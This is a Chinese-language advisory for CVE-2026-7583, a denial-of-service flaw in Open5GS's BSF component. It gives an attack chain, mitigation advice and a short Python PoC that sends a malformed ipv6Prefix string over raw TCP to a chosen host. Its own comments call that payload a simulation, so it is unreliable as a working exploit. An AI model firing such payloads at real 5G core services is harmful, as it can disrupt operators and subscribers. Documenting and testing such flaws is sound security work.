CVE-2026-7583 Open5GS拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-7583

漏洞类型

拒绝服务

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open5GS

漏洞概述

Open5GS 2.7.7及之前版本的安全组件中存在一处缺陷，涉及BSF组件的`bsf_sess_find_by_ipv6prefix`函数。攻击者可通过远程网络发送特制的`ipv6Prefix`参数，利用该缺陷操纵程序逻辑。此漏洞可导致目标服务崩溃或无响应，从而引发拒绝服务。鉴于利用代码已公开，风险显著，且目前官方尚未发布修复补丁。

技术细节

该漏洞位于Open5GS移动核心网的BSF（绑定支持功能）组件，具体影响源代码文件`/src/bsf/context.c`中的`bsf_sess_find_by_ipv6prefix`函数。漏洞产生的根本原因是该函数在解析和处理`ipv6Prefix`参数时，未对输入数据的格式、长度或边界条件进行充分校验。攻击者可以通过网络向目标BSF接口发送包含恶意构造的IPv6前缀参数的数据包。这种操纵可能导致底层会话查找逻辑出现严重错误，例如访问非法内存地址（空指针解引用）、触发断言失败或导致资源耗尽。由于Open5GS负责处理关键的信令流量，该组件的崩溃将直接导致5G网络中的会话管理功能瘫痪，造成拒绝服务。根据CVSS 3.1评分，该漏洞攻击复杂度低，且可被远程利用，对运营商网络的业务连续性构成威胁。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别暴露在互联网上的Open5GS BSF组件服务端口。

STEP 2

2. 漏洞利用

攻击者构造包含恶意`ipv6Prefix`参数的数据包，发送给目标服务器。

STEP 3

3. 触发崩溃

Open5GS在处理该参数时，`bsf_sess_find_by_ipv6prefix`函数发生错误，导致服务异常终止。

STEP 4

4. 拒绝服务

BSF组件不可用，影响依赖该组件的5G核心网业务，导致服务中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import sys

# PoC for CVE-2026-7583 (Open5GS BSF DoS)
# Description: This script attempts to trigger the denial of service
# by sending a malformed ipv6Prefix argument to the target Open5GS BSF service.

def send_exploit(target_ip, target_port):
    try:
        # Constructing a malicious payload.
        # The vulnerability is triggered by manipulating the 'ipv6Prefix' argument.
        # In a real scenario, this would be encapsulated in the specific protocol used by BSF.
        # Here we simulate a buffer overflow or format string trigger.
        
        # Example payload simulating a long or malformed IPv6 prefix
        malicious_prefix = b"ipv6Prefix=" + b"\x00" * 1000 + b"::/128"
        
        print(f"[*] Connecting to {target_ip}:{target_port}...")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target_ip, target_port))
        
        print(f"[*] Sending malicious payload...")
        s.send(malicious_prefix)
        
        s.close()
        print("[+] Payload sent. Check if the Open5GS service has crashed.")
        
    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print(f"Usage: python {sys.argv[0]} <IP> <PORT>")
        sys.exit(1)
    
    TARGET_IP = sys.argv[1]
    TARGET_PORT = int(sys.argv[2])
    send_exploit(TARGET_IP, TARGET_PORT)

影响范围

Open5GS <= 2.7.7

防御指南

临时缓解措施

在官方修复版本发布之前，建议通过访问控制列表（ACL）严格限制对Open5GS BSF组件的网络访问，仅允许可信的信令网关或管理终端进行连接。同时，应加强对核心网流量的监控，一旦检测到异常的请求频率或数据格式，立即进行阻断。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7583
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7583
3 Details https://www.cvedetails.com/cve/CVE-2026-7583/
4 VulDB https://vuldb.com/cve/CVE-2026-7583
5 Link https://github.com/open5gs/open5gs/
6 Link https://github.com/open5gs/open5gs/issues/4401
7 Link https://vuldb.com/submit/804322
8 Link https://vuldb.com/vuln/360530
9 Link https://vuldb.com/vuln/360530/cti